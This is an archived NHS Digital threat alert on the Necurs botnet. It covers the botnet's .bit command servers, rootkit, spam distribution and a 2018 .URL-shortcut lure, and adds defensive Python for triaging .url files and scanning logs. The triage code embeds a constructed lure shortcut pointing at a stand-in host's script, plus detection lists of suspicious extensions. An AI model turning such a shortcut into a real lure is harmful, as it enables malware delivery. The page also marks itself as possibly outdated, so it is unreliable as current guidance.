Necurs Botnet

Necurs is an email spam botnet responsible for delivering numerous other popular malware including Locky, Dridex, Zeus, TeslaCrypt, TrickBot and Magnitude.

This content has been archived

This article no longer conforms to NHS Digital's standards for cyber alerts and may contain outdated or inaccurate information. Use of the information contained in this page is at your own risk.

Affected platforms

The following platforms are known to be affected:

Threat details

Necurs has also been used in malvertising campaigns, distributed denial-of-service (DDoS) attacks and stock manipulation. Its modular nature makes it very resilient: readily obtained modules give it new capabilities, and its operators are highly motivated to seek out new partnerships with other malware authors.

Necurs was first observed in 2012 in Eastern Europe as a rootkit used to install other malware from a Dot-Bit (.bit) domain. The .bit top-level domain (TLD) is resolved through the Namecoin blockchain rather than the standard Domain Name System (DNS), so no registrar or court order can seize the name and control remains solely with the domain owner. The malware reaches the domain through a specific hard-coded proxy setting rather than the victim's normal resolver, so ordinary DNS logging may never see the lookup. This command and control (C2) infrastructure was unique to Necurs at the time and, coupled with its kernel-mode rootkit capabilities, made Necurs extremely difficult to remove from a system. Botnet capabilities were added later that same year.

Once a system is compromised and enrolled in the botnet, it is used to distribute other malware in spam campaigns. These campaigns use only a portion of the botnet, typically up to a million bots out of a total of around 5 million. The Necurs operators added a DDoS module in 2016, at which point they began offering this capability to buyers.


Threat updates

30 Apr 2018

Necurs is now using .URL files in an update to its traditional infection chain. .URL files (also known as Internet shortcuts) contain INI-format content, including the IconFile and IconIndex keys that tell Windows Explorer which icon to display for the file. Necurs uses this to change the file icon so that users may be tricked into thinking the file is less suspicious (for example, a folder or document rather than a web link). Once clicked, the .URL accesses a remote resource to download a secondary dropper, which in turn delivers the final payload. The Necurs payload has also changed to the QuantLoader trojan.
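As an added example (not part of the NHS Digital alert and not a Necurs sample), the following Python script parses the [InternetShortcut] section of a .url file and flags the traits the update describes: a target that is a remote file rather than a web page, a script or executable extension on that target, and an icon borrowed from a Windows system library so the shortcut does not look like a web link. The check for an IconFile that is itself a UNC or file:// path goes beyond the update; it matters because Explorer connects to that host merely to draw the icon. Both embedded shortcuts are constructed for illustration; 203.0.113.10 is a documentation address and the share, file and icon names are invented.

```python
"""Triage a Windows Internet Shortcut (.url) file for the lure traits described in the update.

A .url file is INI text whose [InternetShortcut] section holds, among others:
  URL=        what Windows opens when the shortcut is double-clicked
  IconFile=   the file (local path, UNC path or URL) whose icon Explorer shows for the shortcut
  IconIndex=  the icon index inside IconFile
Everything below is an added illustration; the two embedded shortcuts are constructed, not samples.
"""
import configparser
import posixpath
from urllib.parse import urlparse

# Extensions that indicate the "remote resource" is itself a dropper rather than a web page.
SCRIPT_EXTENSIONS = {".js", ".jse", ".vbs", ".vbe", ".wsf", ".wsh", ".hta", ".ps1",
                     ".cmd", ".bat", ".exe", ".scr", ".lnk", ".jar"}
# Libraries whose icons (folder, document, drive) are commonly borrowed to disguise a shortcut.
SYSTEM_ICON_LIBRARIES = {"shell32.dll", "imageres.dll", "explorer.exe"}

# Constructed lure: opens a script over SMB (file://host/...) while showing a shell32 folder icon.
# 203.0.113.10 is a documentation address; the share and file names are invented.
SUSPICIOUS_URL_FILE = """[InternetShortcut]
URL=file://203.0.113.10/share/invoice.js
IconFile=C:\\Windows\\System32\\shell32.dll
IconIndex=3
"""

# Constructed benign shortcut of the kind a browser writes: https target, favicon icon.
BENIGN_URL_FILE = """[InternetShortcut]
URL=https://www.example.org/
IconFile=https://www.example.org/favicon.ico
IconIndex=0
"""


def parse_internet_shortcut(text):
    """Return the [InternetShortcut] section as a dict with lower-cased keys."""
    parser = configparser.ConfigParser(interpolation=None, strict=False, delimiters=("=",))
    parser.read_string(text)
    for section in parser.sections():          # section name is matched case-insensitively
        if section.lower() == "internetshortcut":
            return dict(parser.items(section))
    raise ValueError("no [InternetShortcut] section")


def triage(text):
    """Return a list of human-readable findings; an empty list means nothing stood out."""
    shortcut = parse_internet_shortcut(text)
    findings = []

    target = shortcut.get("url", "")
    parsed = urlparse(target)
    # file://host/... is a UNC path: Windows fetches it over SMB (falling back to WebDAV).
    if parsed.scheme.lower() == "file" and parsed.netloc:
        findings.append(f"URL fetches a remote file over SMB/WebDAV: {target}")
    extension = posixpath.splitext(parsed.path)[1].lower()
    if extension in SCRIPT_EXTENSIONS:
        findings.append(f"URL target has a script/executable extension: {extension}")

    icon = shortcut.get("iconfile", "")
    icon_name = icon.replace("\\", "/").rsplit("/", 1)[-1].lower()
    if icon_name in SYSTEM_ICON_LIBRARIES:
        findings.append(f"IconFile borrows icon {shortcut.get('iconindex', '0')} from {icon_name}; "
                        "the shortcut will not look like a web link")
    # Beyond the update itself: a UNC IconFile makes Explorer connect out just to draw the icon.
    if icon.startswith("\\\\") or icon.lower().startswith("file://"):
        findings.append(f"IconFile is a remote path; Explorer will contact it on display: {icon}")
    return findings


if __name__ == "__main__":
    for label, content in (("suspicious", SUSPICIOUS_URL_FILE), ("benign", BENIGN_URL_FILE)):
        print(label, "->", triage(content) or ["no findings"])
```

Run it over quarantined attachments or a mail gateway's extracted files; a .url whose URL is a file:// or bare IP target, or whose IconFile names a system DLL, is worth holding regardless of what the icon index resolves to, because a browser-written shortcut points its icon at the site's favicon rather than at shell32.dll.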


Remediation advice

Remediation steps

To avoid botnet infection, ensure that:

  • A robust programme of education and awareness training is delivered to users so that they do not open attachments or follow links in unsolicited emails.
  • All operating systems, antivirus and other security products are kept up to date.
  • All day-to-day computer activities such as email and internet browsing are performed using non-administrative accounts.
  • Strong password policies are in place and password reuse is discouraged.
  • Network, proxy and firewall logs are monitored for suspicious activity.
  • Credentials for any user accounts used on infected machines are reset from a clean computer.
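As an added example (not part of the NHS Digital alert), the following Python script applies the log-monitoring advice above to two constructed log extracts, using the two network traits the threat details and the April 2018 update supply: DNS queries for names under the .bit TLD, and shortcut targets fetched from Internet hosts. The alert says only that the .URL "accesses a remote resource"; the SMB (TCP/445) check assumes a file://host/ target, which Windows retrieves over SMB. The third check, for DNS sent to resolvers the organisation did not sanction, goes beyond the page and follows from the hard-coded resolution path described in the threat details: a lookup that bypasses the corporate resolver is invisible to the first check but shows up as port-53 traffic to an unexpected host. The internal ranges, the approved resolver 10.20.0.2, both log formats and every line in them are constructed for this example.

```python
"""Log checks that follow from the Necurs details above (added example, not part of the alert).

Two traits of the botnet give a network defender something concrete to look for:
  * its C2 lived under the .bit TLD, which ordinary DNS cannot resolve, so a .bit query reaching
    the corporate resolver means software on that host is trying an alternative namespace;
  * the .URL lure fetches its dropper from a remote target; for a file://host/ target Windows uses
    SMB (TCP/445) to an Internet address, something workstations almost never do legitimately.
Because Necurs resolved .bit through a hard-coded path, its lookups may bypass the corporate
resolver entirely, so a third check flags DNS traffic to resolvers other than the approved ones.
The log lines and formats below are constructed for this example; adapt the regexes to your source.
"""
import ipaddress
import re

# Constructed DNS log: "<timestamp> <client> <qtype> <qname>". Names are placeholders, not IOCs.
DNS_LOG = """2018-04-30T09:12:01Z 10.20.1.15 A updates.example.org
2018-04-30T09:12:04Z 10.20.1.15 A placeholder-one.bit
2018-04-30T09:12:09Z 10.20.1.23 AAAA mail.example.org
2018-04-30T09:13:44Z 10.20.1.15 A placeholder-two.bit.
"""

# Constructed firewall log: "<timestamp> <src>:<sport> -> <dst>:<dport> <proto> <action>".
# 203.0.113.x and 198.51.100.x are documentation ranges standing in for Internet hosts.
FIREWALL_LOG = """2018-04-30T09:12:05Z 10.20.1.15:51230 -> 203.0.113.10:445 TCP allow
2018-04-30T09:12:06Z 10.20.1.15:51231 -> 10.20.5.4:445 TCP allow
2018-04-30T09:12:07Z 10.20.1.23:51232 -> 198.51.100.7:443 TCP allow
2018-04-30T09:12:08Z 10.20.1.15:53012 -> 203.0.113.53:53 UDP allow
2018-04-30T09:12:09Z 10.20.1.23:53013 -> 10.20.0.2:53 UDP allow
"""

# Assumptions for the example: RFC 1918 space is "internal" and 10.20.0.2 is the only sanctioned resolver.
INTERNAL_NETWORKS = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]
APPROVED_RESOLVERS = {"10.20.0.2"}

DNS_RE = re.compile(r"^(?P<ts>\S+) (?P<client>\S+) (?P<qtype>\S+) (?P<qname>\S+)$")
FW_RE = re.compile(r"^(?P<ts>\S+) (?P<src>[\d.]+):(?P<sport>\d+) -> "
                   r"(?P<dst>[\d.]+):(?P<dport>\d+) (?P<proto>\S+) (?P<action>\S+)$")


def is_internal(address):
    """True if the address falls inside one of the organisation's internal ranges."""
    ip = ipaddress.ip_address(address)
    return any(ip in net for net in INTERNAL_NETWORKS)


def bit_tld_queries(log):
    """(client, qname) for every DNS query whose name sits under the .bit TLD."""
    hits = []
    for line in log.splitlines():
        m = DNS_RE.match(line)
        if m and m["qname"].rstrip(".").lower().endswith(".bit"):
            hits.append((m["client"], m["qname"].rstrip(".")))
    return hits


def _flows(log, proto, dport):
    """(src, dst) for each firewall record matching the given protocol and destination port."""
    for line in log.splitlines():
        m = FW_RE.match(line)
        if m and m["proto"] == proto and m["dport"] == str(dport):
            yield m["src"], m["dst"]


def outbound_smb(log):
    """(src, dst) for TCP/445 from an internal host to an external address."""
    return [(s, d) for s, d in _flows(log, "TCP", 445) if is_internal(s) and not is_internal(d)]


def rogue_resolver_traffic(log, approved=APPROVED_RESOLVERS):
    """(src, dst) for UDP/53 sent to a resolver the organisation did not sanction."""
    return [(s, d) for s, d in _flows(log, "UDP", 53) if d not in approved]


def suspect_hosts(dns_log, fw_log):
    """Internal hosts tripping any of the three checks, most indicators first."""
    score = {}
    for client, _ in bit_tld_queries(dns_log):
        score[client] = score.get(client, 0) + 1
    for src, _ in outbound_smb(fw_log) + rogue_resolver_traffic(fw_log):
        score[src] = score.get(src, 0) + 1
    return sorted(score, key=lambda host: -score[host])


if __name__ == "__main__":
    print("bit queries:", bit_tld_queries(DNS_LOG))
    print("outbound SMB:", outbound_smb(FIREWALL_LOG))
    print("rogue resolvers:", rogue_resolver_traffic(FIREWALL_LOG))
    print("suspect hosts:", suspect_hosts(DNS_LOG, FIREWALL_LOG))
```

The DNS check catches only lookups that reach a resolver you log, so the two firewall checks matter more for a bot that carries its own resolution path; DNS over TCP/53 is deliberately left out of the resolver check to keep the example short and should be added in practice. A host that trips more than one check is the one to isolate and reimage first, and its users' credentials are the ones to reset from a clean machine, as the last remediation step advises.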

Last edited: 11 January 2022 11:47 am